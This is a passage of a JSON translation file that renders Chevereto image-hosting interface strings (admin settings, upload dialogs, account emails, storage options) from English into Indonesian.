diperlukan"],"Share":["Bagikan"],"Embed codes":["Kode cantumkan"],"Full info":["Informasi lengkap"],"%a album hosted in %w":["%a album disimpan di %w"],"Stats":["Status"],"Images":["Foto"],"Albums":["Album"],"Users":["Pengguna"],"Settings":["Pengaturan"],"Chevereto version":["Versi Chevereto"],"install update":["Pasang pembaharuan"],"check for updates":["Cek pembaharuan"],"Support":["Dukungan"],"Need help? Go to %s and you will get help quickly.":["Butuh bantuan? Pergi ke %s dan anda akan mendapatkan bantuan segera."],"PHP version":["Versi PHP"],"Server":["Server"],"MySQL version":["Versi MySQL"],"MySQL server info":["Informasi server MySQL"],"GD Library":["Perpustakaan GD"],"File uploads":["Mengunggah berkas"],"Enabled":["Diaktifkan"],"Disabled":["Dinonaktifkan"],"Max. upload file size":["Ukuran unggah berkas maks."],"Max. post size":["Ukuran maks. penulisan"],"Max. execution time":["Waktu maks. eksekusi"],"%d second":["%d detik"],"Memory limit":["Batas memori"],"Links":["Tautan"],"Documentation":["Dokumentasi"],"Changelog":["Catatan perubahan"],"Request new features":["Minta fitur baru"],"Bug tracking":["Pelacakan bug"],"Blog":["Blog"],"Website":["Website"],"Content":["Isi"],"Pages":["Laman"],"Listings":["Daftar"],"Image upload":["Foto diunggah"],"Categories":["Kategori"],"Consent screen":["Layar kesepakatan"],"Flood protection":["Anti penggembosan"],"Theme":["Tema"],"Homepage":["Halaman muka"],"Banners":["banner"],"System":["sistem"],"Routing":["Pengarahan"],"Languages":["Bahasa"],"External storage":["Penyimpanan tambahan"],"Email":["Surel"],"Social networks":["Media sosial"],"External services":["Layanan tambahan"],"IP bans":["Blokir IP"],"Additional settings":["Pengaturan tambahan"],"Tools":["Alat-alat"],"Can't delete all homepage cover images":["Tidak dapat menghapus semua gambar sampul halaman muka."],"Homepage cover image deleted":["Gambar halaman muka dihapus"],"Local":["Lokal"],"External":["Tambahan"],"All":["Semua"],"search content":["cari konten"],"Add page":["Tambah laman"],"Edit page ID %s":["Ubah halaman ID %s"],"The page has been added successfully.":["Halaman telah berhasil ditambahkan."],"The page has been deleted.":["Halaman telah dihapus."],"homepage":["beranda"],"Before main title (%s)":["Sebelum judul utama (%s)"],"After call to action (%s)":["Setelah panggilan untuk melakukan (%s)"],"After cover (%s)":["Setelah sampul (%s)"],"After listing (%s)":["Setelah pendaftaran (%s)"],"Before pagination":["Sebelum nomor halaman"],"After pagination":["Setelah nomor halaman"],"Content (image and album)":["Konten (gambar dan album)"],"Tab about column":["Kolom tab tentang"],"Before comments":["Sebelum komentar"],"Image page":["Halaman gambar"],"Inside viewer top (image page)":["Didalam atas penonton (halaman gambar)"],"Expected banner size 728x90":["Ukuran banner diharapkan 728x90"],"Inside viewer foot (image page)":["Didalam kaki penonton (halaman gambar)"],"After image viewer (image page)":["Setelah penampil gambar (halaman gambar)"],"Before header (image page)":["Sebelum judul (halaman gambar)"],"After header (image page)":["Setelah judul (halaman gambar)"],"Footer (image page)":["Kaki (halaman gambar)"],"Album page":["Laman album"],"Before header (album page)":["Sebelum Judul (halaman album)"],"After header (album page)":["Setelah judul (halaman album)"],"User profile page":["Halaman profil pengguna"],"After top (user profile)":["Setelah teratas (profil pengguna)"],"Before listing (user profile)":["Sebelum pendaftaran (profil pengguna)"],"Explore page":["Jelajahi halaman"],"After top (explore page)":["Setelah teratas (halaman jelajahi)"],"NSFW":["NSFW"],"Invalid website name":["Nama website tidak sah"],"Invalid language":["Bahasa tidak sah"],"Invalid timezone":["Zona waktu tidak sah"],"Invalid value: %s":["Nilai tidak valid: %s"],"Invalid upload storage mode":["Mode penyimpanan upload tidak valid"],"Invalid upload filenaming":["Unggah penamaan tidak valid"],"Invalid thumb width":["lebar gambar kecil tidak valid"],"Invalid thumb height":["Tinggi gambar kecil tidak valid"],"Invalid medium size":["Ukuran medium tidak valid"],"Invalid watermark percentage":["Presentasi tanda air tidak valid"],"Invalid watermark opacity":["Kegelapan tanda air tidak valid"],"Invalid theme":["Tema tidak sah"],"Invalid value":["Isi tidak sah"],"Invalid theme tone":["Suasana tema tidak valid"],"Invalid theme main color":["Warna utama tema tidak valid"],"Invalid theme top bar color":["Warna batang atas tema tidak valid"],"Invalid theme top bar button color":["Warna batang bawah tema tidak valid"],"Invalid theme image listing size":["Ukuran tema pendaftaran gambar tidak valid"],"Invalid user id":["Id user salah"],"Invalid email mode":["Mode email tidak benar"],"Invalid SMTP port":["Port SMTP salah"],"Invalid SMTP security":["Pengaman SMTP salah"],"Invalid personal mode user ID":["Mode pribadi ID pengguna tidak valid"],"Invalid or reserved route":["Tidak valid atau dilindungi"],"Invalid website privacy mode":["mode privasi website tidak valid"],"Invalid website content privacy mode":["Mode privasi konten website tidak valid"],"Invalid homepage style":["gaya beranda tidak valid"],"Invalid homepage call to action button color":["Panggilan beranda untuk warna tombol aksi tidak valid"],"Invalid title":["Judul tidak valid"],"Invalid status":["Status tidak valid"],"Invalid type":["Tipe tidak valid"],"Invalid visibility":["Visibilitas tidak valid"],"Invalid target attribute":["Atribut sasaran tidak valid"],"Invalid rel attribute":["Atribut rel tidak valid"],"Invalid icon":["Ikon tidak valid"],"Invalid URL key":["Kunci URL tidak valid"],"Invalid file path":["Jalur file tidak valid"],"Invalid link URL":["Link URL tidak valid"],"Invalid user minimum age":["Usia minimal pengguna tidak valid"],"Only alphanumeric, hyphen and underscore characters are allowed":["Hanya karakter alfanumerik, tanda hubung dan garis bawah yang diperbolehkan"],"Routes can't be the same":["Pengarahan tidak boleh sama"],"Invalid upload image path":["Jalur upload gambar tidak valid"],"Invalid call to action URL":["Panggilan tidak valid untuk aksi URL"],"Max. allowed %s":["Maks. diperbolehkan %s"],"Can't map %m to an existing folder (%f)":["Tidak dapat memetakan %m ke folder yang telah ada (%f)"],"Can't map %m to an existing route (%r)":["Tidak dapat memetakan %m ke rute yang telah ada (%r)"],"Can't map %m to %r (username collision)":["Tidak dapat memetakan %m ke %r (tubrukan nama pengguna)"],"Invalid SMTP server":["Server SMTP tidak valid"],"Invalid SMTP username":["username SMTP tidak valid"],"Invalid URL":["URL tidak valid"],"This URL key is already being used by another page (ID %s)":["Kunci URL ini telah digunakan oleh halaman lainnya (ID %s)"],"This file path is already being used by another page (ID %s)":["Jalur file ini telah digunakan oleh halaman lainnya (ID %s)"],"Can't save page contents: %s.":["Tidak dapat menyimpan isi halaman: %s"],"Following":["Mengikuti"],"About":["Tentang"],"Image ID":["ID Gambar"],"Uploader IP":["IP Pengunggah"],"Ban IP":["Blokir IP"],"IP already banned":["IP telah diblokir"],"Upload date":["Tanggal uplad"],"%s images":["%s gambar"],"Image %i in %a album":["Gambar %i di album %a"],"Image %i in %c category":["Gambar %i di Kategori %c"],"Image %i hosted in %w":["Gambar %i tersimpan di %w"],"Direct links":["Tautan langsung"],"Image URL":["URL gambar"],"Image link":["Tautan gambar"],"Thumbnail URL":["URL sketsa"],"Medium URL":["URL sedang"],"Full image":["Gambar penuh"],"Full image (linked)":["Gambar penuh (terhubung)"],"Medium image (linked)":["Gambar medium (terhubung)"],"Thumbnail image (linked)":["Gambar kecil (terhubung)"],"Login needed":["Login dibutuhkan"],"IP address already banned":["Alamat IP telah di blokir"],"Missing values":["Nilai yang hilang"],"Invalid role":["Peran tidak valid"],"Username already being used":["Username talah digunakan"],"Add a password or another social connection before deleting %s":["Tambahkan sebuah kata sandi atau sambungan sosial lainnya sebelum menghapus %s"],"Add an email or another social connection before deleting %s":["Tambakan sebuah email atau atau sambungan sosial lainnya sebelum menghapus %s"],"%s has been disconnected.":["%s telah terputus."],"Test email from %s @ %t":["Email percobaan dari %s @%t"],"This is just a test":["Ini hanya sebuah percobaan"],"Test email sent to %s.":["Email percobaan telah terkirim ke %s."],"User %s followed":["Pengguna %s diikuti"],"User %s unfollowed":["Pengguna %s batal mengikuti"],"Content liked":["Konten disukai"],"Content disliked":["Konten tidak disukai"],"%u liked your %t %c":["%u menyukai %t %c anda"],"%u is now following you":["%u kini mengikuti anda"],"A private user":["Pengguna pribadi"],"Wrong Username\/Email password combination":["Kombinasi Username\/password email salah"],"Sign in":["Masuk"],"Logged out":["Keluar"],"General questions\/comments":["Pertanyaan\/komentar umum"],"DMCA complaint":["Pengaduan DCMA"],"Invalid name":["Nama tidak valid"],"Invalid message":["Pesan tidak valid"],"Invalid subject":["Judul tidak valid"],"Invalid reCAPTCHA":["reCAPTCHA tidak valid"],"Can't submit the form: %s":["Tidak dapat mengirim formulir: %s"],"Message sent. We will get in contact soon.":["Pesan terkirim. Kami akan menghubungi segera."],"Mail error":["Pos galat"],"Image search results for %s":["Hasil pencarian gambar %s"],"Album search results for %s":["Hasil pencarian album %s"],"User search results for %s":["Hasil pencarian user %s"],"Account":["Akun"],"Profile":["Profil"],"Linked accounts":["Akun terhubung"],"Invalid image expiration: %s":["Kadaluarsa gambar tidak valid: %s"],"An email has been sent to %s with instructions to activate this email":["Sebuah email telah terrkirim ke %s dengan instruksi untuk mengaktifkan email ini"],"Invalid website":["Website tidak valid"],"Wrong password":["Kata sandi salah"],"Use a new password":["Gunakan password baru"],"Changes have been saved.":["Perubahan telah disimpan."],"Password has been changed":["Kata sandi telah diubah"],"Password has been created.":["Password telah dibuat"],"Wrong Username\/Email values":["Nilai Nama pengguna\/Email salah"],"Settings for %s":["Pengaturan untuk %s"],"You must be at least %s years old to use this website.":["Anda paling tidak harus berumur %s tahun untuk bisa menggunakan website ini."],"Create account":["Buat akun"],"%s's Images":["Gambar %s"],"%s's Albums":["Album %s"],"Results for":["Hasil untuk"],"Liked by %s":["Disukai oleh %s"],"Liked":["Disukai"],"Followers":["Pengikut"],"%n (%u) albums on %w":["%n (%u) album pada %w"],"%n (%u) on %w":["%n (%u) pada %w"],"Close":["Tutup"],"Advanced search":["Pencarian lanjutan"],"Random":["Acak"],"Notices (%s)":["Pemberitahuan (%s)"],"Upload":["Unggah"],"Sign in with another account":["Masuk dengan akun lain"],"or":["atau"],"Username or Email address":["Username atau alamat email"],"Keep me logged in":["Biarkan saya tetap masuk"],"Don't have an account? <a href='%s'>Sign up<\/a> now.":["Tidak memiliki sebuah akun? <a href='%s'>Daftar<\/a> Sekarang."],"Sign up with another account":["Daftar menggunakan akun lain"],"Email address":["Alamat surel"],"Username":["Nama pengguna"],"I'm at least %s years old":["Saya telah berumur %s tahun"],"By signing up you agree to our <a href=\"%s\">Terms of service<\/a>":["Dengan mendaftar, berarti anda menyetujui <a href=\"%s\">Persyaratan layanan<\/a> Kami"],"Notifications":["Notifikasi"],"loading":["menunggu"],"You don't have notifications":["Anda tidak memiliki notifikasi"],"My Profile":["Profil ku"],"Sign out":["Keluar"],"We received a request to change the email of your <a href=\"%u\">%n<\/a> account at %w.":["Kami menerima sebuah permintaan untuk mengganti email dari <a href=\"%u\">%n<\/a> akun pada %w"],"To complete the process you must <a href=\"%s\">activate your email<\/a>.":["Untuk menyelesaikan langkah anda harus <a href=\"%s\">mengaktivasi email anda<\/a>."],"Alternatively you can copy and paste the URL into your browser: <a href=\"%s\">%s<\/a>":["Atau anda dapat menyalin dan menempel URL ke browser anda: <a href=\"%s\">%s<\/a>"],"If you didn't intend this just ignore this message.":["Jika anda tidak melakukan hal ini abaikan pesan ini."],"This request was made from IP: %s":["Permintaan ini diminta dari IP: %s"],"We received a request to register the %n account at %w.":["Kami menerima sebuah permintaan pendaftaran akun %n pada %w."],"To complete the process you must <a href=\"%s\">activate your account<\/a>.":["Untuk menyelesaikan langkah anda harus <a href=\"%s\">mengaktivasi email anda<\/a>."],"We received a request to reset the password for your <a href=\"%u\">%n<\/a> account.":["Kami menerima sebuah permintaan untuk mengganti kata sandi untuk <a href=\"%u\">%n<\/a> akun anda."],"To reset your password <a href=\"%s\">follow this link<\/a>.":["Untuk mengganti kata sandi <a href=\"%s\">ikuti link ini<\/a>."],"Hi %n, welcome to %w":["Hi %n, Selamat datang ke %w"],"Now that your account is ready you can enjoy uploading your images, creating albums and setting the privacy of your content as well as many more cool things that you will discover.":["Akun anda kini telah siap anda dapat mengunggah gambar, membuat album tan mengatur privasi dari akun anda sebaik banyak hal yang akan ada temukan."],"By the way, here is you very own awesome profile page: <a href=\"%u\">%n<\/a>. Go ahead and customize it, its yours!.":["Ngomong-ngomong, ini merupakan halaman profil anda yang mengagumkan: <a href=\"%u\">%n<\/a>. Lanjutkan dan sesuaikan, Itu milik anda!."],"Thank you for joining":["Terima kasih telah bergaung"],"This email was sent from %w %u":["Email ini dikirm dari %w %u"],"Drag and drop or paste images here to upload":["Tarik dan lepas atau tempel gambar disini untuk mengunggah"],"Select the images to upload":["Pilih gambar untuk mengunggah"],"browse from your computer":["cari dari komputer anda"],"add image URLs":["tambah URL gambar"],"You can also %i or %u.":["Anda dapat %i atau %u."],"take a picture":["ambil sebuah gambar"],"Edit or resize any image by clicking the image preview":["Ubah atau ukur ulang gambar apapun dengan mengklik pratinjau gambar"],"Edit or resize any image by touching the image preview":["Ubah atau ukur ulang gambar apapun dengan menyentuh pratinjau gambar"],"your computer":["komputer anda"],"image URLs":["URL gambar"],"You can keep adding more images from %i or from %u.":["Anda dapat tetap menambahkan lebih banyak gambar dari %i atau dari %u."],"your device":["perangkat anda"],"Uploading %q %o":["Mengunggah %q %o"],"complete":["selesai"],"The queue is being uploaded, it should take just a few seconds to complete.":["Antrian sedang diunggah, hal ini harusnya berlangsung beberapa saat untuk selesai."],"Upload complete":["Upload selesai"],"Uploaded content added to %s.":["Konten terunggah ditambahkan ke %s."],"You can %c with the content just uploaded or %m.":["Anda dapat %c dengan konten yang baru saja terunggah atau %m."],"You can %c with the content just uploaded.":["Anda dapat %c dengan konten yang baru saja terunggah."],"create a new album":["buat sebuah album baru"],"move it to an existing album":["pindahkan ke album yang sudah ada"],"create an account":["buat sebuah akun"],"sign in":["masuk"],"You can %s or %l to save this content into your account.":["anda dapat %s atau %l untuk menyimpan konten ini ke akun anda."],"No %s have been uploaded":["tidak ada %s yang barus saja terunggah"],"Some errors have occured and the system couldn't process your request.":["Beberapa kesalahan terjadi dan sistem tidak dapat memproses permintaan anda."],"Category":["Kategori"],"Select category":["Pilih kategori"],"Mark this if the upload is not family safe":["Tandai ini jika upload tidak aman untuk keluarga"],"Not family safe upload":["Upload tidak aman untuk keluarga"],"Uploading":["mengunggah"],"cancel":["batal"],"cancel remaining":["batalkan sisanya"],"Note: Some images couldn't be uploaded.":["Catatan: Beberapa gambar tidak dapat diunggah."],"learn more":["pelajari lebih banyak"],"Check the <a data-modal=\"simple\" data-target=\"failed-upload-result\">error report<\/a> for more information.":["Periksa <a data-modal=\"simple\" data-target=\"failed-upload-result\">laporan kesalahan<\/a> untuk informasi lebih lanjut."],"max":["maks"],"close":["tutup"],"copy":["salin"],"Edit":["Edit"],"Remove":["Hapus"],"Edit image":["Edit gambar"],"Title":["Judul"],"optional":["pilihan"],"Resize image":["Ubah ukuran gambar"],"Width":["Lebar"],"Height":["Tinggi"],"Note: Animated GIF images won't be resized.":["Catatan: Gambar animasi GIF tidak bisa di ubah ukuran."],"Auto delete image":["Hapus otomatis gambar"],"Sign up":["Mendaftar"],"%s to be able to customize or disable image auto delete.":["%s tidak dapat mengkostumisasi atau mematikan hapus gambar otomatis."],"Mark this if the image is not family safe":["Tandai ini jika gambar tidak aman untuk keluarga"],"Flag as unsafe":["Tandai sebagai tidak aman"],"Description":["Deskripsi"],"Brief description of this image":["Deskripsi singkat gambar ini"],"Add image URLs":["Tambahkan URL gambar"],"Add the image URLs here":["Tambahkan URL gambar disini"],"Create album":["Buat album"],"The uploaded content will be moved to this newly created album. You can also move the content to an <a class=\"modal-switch\" data-switch=\"move-existing-album\">existing album<\/a>.":["Konten yang terupload akan dipindahkan ke album baru yang terbuat. Anda juga dapan memindah kontek ke <a class=\"modal-switch\" data-switch=\"move-existing-album\">album yang telah ada<\/a>."],"Move to album":["Pindahkan ke album"],"Select an existing album to move the uploaded content. You can also <a class=\"modal-switch\" data-switch=\"move-new-album\">create a new album<\/a> and move the content there.":["Pilih sebuah album yang ada untuk memindah konten yang telah diupload Anda juga dapat <a class=\"modal-switch\" data-switch=\"move-new-album\">membuat sebuah album baru<\/a> dan memindahkan konten kesana."],"Error report":["Laporan error"],"album":["album"],"Viewer links":["Penonton tautan"],"HTML Codes":["Kode HTML"],"HTML image":["Gambar HTML"],"HTML full linked":["Tautan penuh HTML"],"HTML medium linked":["Tautan medium HTML"],"HTML thumbnail linked":["Tautan gambar kecil HTML"],"BBCodes":["BBcode"],"BBCode full":["BBcode penuh"],"BBCode full linked":["Tautan BBcode penuh"],"BBCode medium linked":["Tautan BBcode sedang"],"BBCode thumbnail linked":["Tautan BBcode gambar kecil"],"Markdown full":["Markdown penuh"],"Markdown full linked":["Markdown penuh terhubung"],"Markdown medium linked":["Markdown sedang terhubung"],"Markdown thumbnail linked":["Thumbnail Markdown ditambahkan"],"All these words":["Semua kata ini"],"Type the important words: tri-colour rat terrier":["Ketik kata-kata penting: tri-warna tikus terrier"],"This exact word or phrase":["Kata atau farsa tertentu ini"],"Put exact words in quotes: \"rat terrier\"":["Berikan kata yang tepat dalam tanda kutip: \"sejenis tikus\""],"None of these words":["Tak satu pun dari kata-kata ini"],"Put a minus sign just before words you don't want: -rodent -\"Jack Russell\"":["Berikan tanda minus sebelum kata yang tidak anda inginkan: -hewan pengerat -\"Jack Russell\""],"Storage":["Penyimpanan"],"IP address":["Alamat IP"],"Album name":["Nama Album"],"move to existing album":["pindahkan ke album yang ada"],"Album description":["Deskripsi Album"],"Brief description of this album":["Deskripsi singkat album ini"],"Album privacy":["Privasi album"],"Who can view this content":["Siapa yang bisa melihat konten ini"],"Private (just me)":["Pribadi (hanya saya)"],"Private (anyone with the link)":["Pribadi (siapapun yang memiliki tautan)"],"Private (password protected)":["Privat (dilindungi kata sandi)"],"Album password":["Kata sandi album"],"Name":["Nama"],"Category name":["Nama kategori"],"URL key":["Kunci URL"],"Category URL key":["Kunci kategori URL"],"Only letters, numbers, and hyphens":["hanya huruf, nomor dan tanda hubung"],"Brief description of this category":["Deskripsi singkat dari kategori ini"],"Untitled image":["gambar belum berjudul"],"Expiration date":["Tanggal kadaluarsa"],"YYYY-MM-DD HH:MM:SS":["TTTT-BB-HH JJ-MM-DD"],"Example":["Contoh"],"Until which date this IP address will be banned? Leave it empty for no expiration.":["Sampai kapan alamat IP ini diblokir? Biarkon kosong jika tidak ada kadaluarsa"],"Message":["Pesan"],"Text message, HTML or a redirect URL":["Pesan teks, HTML atau sebuah URL pengarahan"],"Existing album":["Album yang telah ada"],"create new album":["buat album baru"],"Storage name":["Nama penyimpanan"],"API":["API"],"Region":["Region"],"Storage bucket":["Keranjang penyimpanan"],"Key":["Kunci"],"Storage key":["Kunci penyimpanan"],"Secret":["Rahasia"],"Storage secret":["Rahasia Penyimpanan"],"Client email":["Email klien"],"Google Cloud client email":["klien email google cloud"],"You will need a <a %s>service account<\/a> for this.":["Anda memerlukan sebuah <a %s>layanan akun<\/a> untuk hal ini."],"Private key":["Kunci pribadi"],"Google Cloud JSON key":["Kunci JSON Google Cloud"],"Service name":["Nama layanan"],"Identity URL":["Identitas URL"],"Storage region":["Region Penyimpanan"],"Container":["Isi"],"Storage container":["Isi penyimpanan"],"Tenant id":["ID Penyewa"],"Tenant id (account id)":["ID Penyewa (id akun)"],"Tenant name":["Nama Penyewa"],"Tenant name (account name)":["Nama Penyewa (nama akun)"],"Hostname or IP of the storage server":["Hostname atau IP server penyimpanan"],"Path":["Jalur"],"Server path":["Jalur server"],"Server path where the files will be stored":["Jalur server dimana berkas akan disimpan"],"Server username":["Nama pengguna Server"],"Server password":["Kata sandi Server"],"Storage capacity":["Ukuran penyimpanan"],"Example: 20 GB, 1 TB, etc.":["Contoh: 20 GB, 1 TB, dll."],"This storage will be disabled when it reach this capacity. Leave it blank or zero for no limit.":["Penyimpanan ini akan dinonaktifkan ketika telah menyampai kapasitas ini. Biarkan kosong atau nol untuk tidak membatasi."],"Storage URL":["URL penyimpanan"],"The system will map the images of this storage to this URL.":["Sistem akan memetakan gambar ke penyimnanan ini untuk URL ini."],"view more":["tampilkan lebih banyak"],"Load more":["Muat lebih banyak"],"Select all":["Pilih Semua"],"Clear selection":["Hapus pilihan"],"Selection":["Pilihan"],"Action":["Tindakan"],"Get embed codes":["Dapatkan kode sematkan"],"Assign category":["Tetapkan kategori"],"Flag as safe":["Tandai aman"],"Delete":["Hapus"],"Create new album":["Buat album baru"],"To use all the features of this site you must be logged in. If you don't have an account you can <a href=\"%s\">sign up<\/a> right now.":["Untuk menggunakan semua fitur dari situs ini anda harus masuk. Jika tidak memiliki akun anda dapat <a href=\"%s\">mendaftar<\/a> sekarang."],"There's nothing to show here.":["Tidak ada yang ditampilkan disini."],"Upload images":["Unggah gambar"],"Edit image details":["Edit detail gambar"],"Edit album details":["Edit detail album"],"All the images will be moved to this newly created album. You can also move the images to an <a class=\"modal-switch\" data-switch=\"move-existing-album\">existing album<\/a>.":["Semua gambar akan dipindahkan ke album yang baru dibuat ini. Abda juga dapat memindah gambar ke <a class=\"modal-switch\" data-switch=\"move-existing-album\">album yang ada<\/a>."],"Select an existing album to move the image. You can also <a class=\"modal-switch\" data-switch=\"move-new-album\">create a new album<\/a> and move the image there.":["Pilih sebuah album yang ada untuk memindahkan gambar. Anda juga dapat <a class=\"modal-switch\" data-switch=\"move-new-album\">membuat album baru<\/a> dan memindahkan gambar kesana."],"Select an existing album to move the album contents. You can also <a class=\"modal-switch\" data-switch=\"move-new-album\">create a new album<\/a> and move the album contents there.":["Pilih sebuah album untuk memindahkan isi album. Anda juga dapat <a class=\"modal-switch\" data-switch=\"move-new-album\">membuat album baru<\/a> dan memindahkan isi album kesana."],"Select an existing album to move the images. You can also <a class=\"modal-switch\" data-switch=\"move-new-album\">create a new album<\/a> and move the images there.":["Pilih sebuah album yang ada untuk memindahkan gambar. Anda juga dapat <a class=\"modal-switch\" data-switch=\"move-new-album\">membuat album baru<\/a> dan memindahkan gambar kesana."],"All the selected images will be assigned to this category.":["Semua gambar yang dipilih akan di tempatkan ke kategori ini."],"There is no categories.":["Tidak ada kategori."],"Confirm flag content as safe":["Konfirmasi penandaan konten sebagai aman"],"Do you really want to flag this content as safe?":["Apakah anda yakin menandai konten ini aman?"],"Confirm flag content as unsafe":["Konfirmasi penandaan tidak aman"],"Do you really want to flag this content as unsafe?":["Apakah anda yakin menandai konten ini tidak aman?"],"Confirm deletion":["Konfirmasi penghapusan"],"Do you really want to remove this content? This can't be undone.":["Apakah anda benar-benar ingin menghapus konten ini? Hal ini tidak dapat dibatalkan."],"Do you really want to remove all the selected content? This can't be undone.":["Apakah anda benar-benar ingin menghapus semua konten yang dipilih? Hal ini tidak dapat dibatalkan"],"Uploaded by guest":["Diunggah oleh pengunjung"],"From %s":["Dari %s"],"Uploaded by private":["Diunggah oleh pribadi"],"by %u":["oleh %u"],"Select":["Pilih"],"The requested page was not found.":["Halaman yang diminta tidak ditemukan"],"Search something else":["Cari sesuatu yang lain"],"The user has been deleted":["Pengguna telah dihapus"],"The content has been deleted.":["Konten telah dihapus."],"Your account is almost ready":["Akun anda hampir siap"],"An email to %s has been sent with instructions to activate your account. The activation link is only valid for 48 hours. If you don't receive the instructions try checking your junk or spam filters.":["Sebuah email ke %s telah dikirim dengan instruksi untuk mengaktifkan akun. Tautan aktivasi hanya berlaku untuk 48 jam. Jika anda tidak menerima instruksi coba periksa sampah atau penyaring spam anda."],"Go to homepage":["Pergi ke beranda"],"Resend activation":["Kirim ulang aktivasi"],"You have successfully changed your account email to %s":["Anda telah berhasil mengubah email aktivasi anda ke %s"],"Go to my profile":["Pergi ke profil ku"],"A confirmation link will be sent to this email with details to activate your account.":["Sebuah tautan konfirmasi akan dikirim ke email ini dengan detail untuk mengaktifkan akun anda."],"Your email address":["Alamat email anda"],"Add email":["Tambahkan email"],"An email with instructions to reset your password has been sent to the registered email address. If you don't receive the instructions try checking your junk or spam filters.":["Sebuah email dengan instruksi mengatur ulang kata sandi anda telah dikirim ke email yang terdaftar. Jika anda tidak menerima instruksi cobalah periksa sampah atau penyaring spam."],"Resend instructions":["Kirim ulang instruksi"],"A previous email has been sent with instructions to reset your password. If you did not receive the instructions try checking your junk or spam filters.":["Email sebelumnya telah dikirim dengan instruksi untuk mengubah kata sandi anda. Jika anda tidak menerima instruksi cobalah periksa sampah atau penyaring spam."],"Enter your username or the email address that you used to create your account.":["Masukkan username atau alamat email yang anda gunakan untuk membuat akun anda."],"Submit":["Kirimkan"],"Your password has been changed. You can now try logging in using your new password.":["Kata sandi anda telah diubah. Kini anda dapat mencoba masuk dengan kata sandi baru anda."],"Login now":["Masuk sekarang"],"Enter the new password that you want to use.":["Masukkan kata sandi yang ingin anda gukanan."],"New Password":["Kata sandi baru"],"%d characters min":["Min. %d karakter"],"Enter your new password":["Masukkan kata sandi baru anda"],"Confirm password":["Konfirmasi kata sandi"],"Re-enter your new password":["Masukkan kembali kata sandi baru anda"],"An email to %s has been sent with instructions to activate your account. If you don't receive the instructions try checking your junk or spam filters.":["Sebuah email ke %s telah dikirimkan dengan instruksi untuk mengaktifkan akun. Jika anda tidak menerima instruksi cobalah periksa sampah atau penyaring spam anda."],"Enter the username or email address that you used to create your account to continue.":["Masukkan username atau alamat email yang anda pakai untuk mendaftar untuk melanjutkan."],"This content is private":["Ini konten pribadi"],"Do you really want to delete this album and all of its images? This can't be undone.":["Apakah anda benar-benar ingin menghapus album ini dan semua gambarnya? Hal ini tidak dapat dibatalkan"],"Delete album":["Hapus album"],"You like this":["Anda menyukai ini"],"Like":["Suka"],"Upload to album":["Unggah ke album"],"Album link":["Tautan album"],"Please read and comply with the following conditions before you continue:":["Harap baca dan patuhi kondisi berikut ini sebelum anda melanjutkan:"],"By clicking in \"I Agree\" you declare that you have read and understood all the conditions mentioned above.":["Dengan mengklik di \"Saya Setuju\" nda menyatakan bahwa Anda telah membaca dan memahami semua kondisi yang disebutkan di atas."],"I Agree":["Saya Setuju"],"Disk used":["Ruang disk digunakan"],"Add user":["Tambahkan pengguna"],"Role":["Peran"],"Administrator":["Administrator"],"This setting is always diabled when using personal website mode.":["Pengaturan ini akan selalu dinonaktifkan ketika menggunakan mode website pribadi."],"documentation":["dokumentasi"],"Learn more about %s at our %d.":["Pelajari lebih lanjut tentang %s di %d kami."],"Add category":["Tambah kategori"],"Add IP ban":["Tambah IP di blokir"],"Add storage":["Tambahkan penyimpanan"],"Return to pages":["Kembali ke halaman"],"Website name":["Nama website"],"Website doctitle":["Doctitle website"],"Website description":["Deskripsi website"],"Website keywords":["Kata kunci website"],"Default time zone":["Zona waktu default"],"Select region":["Pilih region"],"Allows to search images, albums and users based on a given search query.":["Bolehkan pencarian gambar, album dan pengguna berdasarkan permintaan pencarian yang diberikan."],"Enables to browse images randomly.":["Aktifkan mencari gambar secara acak."],"Likes":["Suka"],"Allows users to like content and populate \"Most liked\" listings.":["Memungkinkan pengguna menyukai konten dan mengisi daftar \"Paling disukai\"."],"Followers allows users to follow each other.":["Pengikut membolehkan pengguna untuk saling mengikuti."],"User ID":["ID pengguna"],"Your user id is: %s":["Id pengguna anda adalah: %s"],"Personal mode routing":["Pengarahan mode personal"],"Website privacy mode":["Mode privasi website"],"Private mode will make the website only available for registered users.":["Mode pribadi akan menjadikan website hanya tersedia untuk pengguna terdaftar."],"Content privacy mode":["Mode privasi konten"],"Default":["Default"],"Force private (self)":["Paksa pribadi (sendiri)"],"Force private (anyone with the link)":["Paksa pribadi (semua orang dengan tautan)"],"Forced privacy modes will override user selected privacy.":["Mode privasi dipaksakan akan mengembalikan privasi pengguna terpilih."],"Page title":["Judul halaman"],"Page status":["Status halaman"],"Active page":["Halaman aktif"],"Inactive page (%s)":["Halaman tidak aktif (%s)"],"Only active pages will be accessible.":["Hanya halaman aktif yang dapat diakses."],"Type":["Tipe"],"Page visibility":["Keterlihatan halaman"],"Visible page":["Halaman terlihat"],"Hidden page":["Halaman tersembunyi"],"Hidden pages won't be show in system menus, but anyone can access to it with the link.":["Halaman tersembunyi tidak akan ditampilkan di menu sistem, tetapi semua orang dapat mengakses nya melalui tautan."],"Only alphanumerics, hyphens and forward slash":["Hanya alfanumerik, tanda hubung dan garis miring"],"File path":["Jalur berkas"],"A %f file relative to %s":["Sebuah berkas %f berhubungan dengan %s"],"Meta keywords":["Kata kunci meta"],"Meta description":["Deskripsi meta"],"Source code":["Kode sumber"],"No write permission in %s path you will need to add this file using an external editor.":["Tidak ada izin menulis di jalur %s anda perlu menambahkan berkas ini menggunakan editor eksternal."],"No write permission in %s you will need to edit the contents of this file using an external editor.":["Tidak ada izin menulis di jalur %s anda perlu mengedit konten dari berkas ini menggunakan editor eksternal."],"Taken from: %s":["Diambil dari: %s"],"Link URL":["Tautan URL"],"Select %s to open the page or link in a new window.":["Pilih %s untuk membuka halaman atau tautan di jendela baru."],"Only alphanumerics, hyphens and whitespaces":["Hanya alfanumerik, tanda hubung dan spasi"],"HTML &lt;a&gt; %s attribute":["Atribut HTML &lt;a&gt; %s"],"Link icon":["Ikon tautan"],"Check the <a %s>icon reference<\/a> for the complete list of supported icons.":["Periksa <a %s>referensi ikon<\/a> untuk daftar lengkap ikon yang didukung."],"Sort order display":["Urutan tampilan"],"pages":["halaman"],"Do you really want to delete the page ID %s? This can't be undone.":["Apakah anda yakin ingin menghapus halaman dengan ID %s? Hal ini tidak dapat dibatalkan."],"Unchecked image formats won't be allowed to be uploaded.":["format gambar yang tidak diperiksa tidak akan diperbolehkan untuk diunggah."],"Enable uploads":["Aktifkan upload"],"Enable this if you want to allow image uploads. This setting doesn't affect administrators.":["Aktifkan ini jika anda ingin memperbolehkan upload gambar. Pengaturan ini tidak berdampak pada administrator"],"Guest uploads":["Unggahan pengunjung"],"Enable this if you 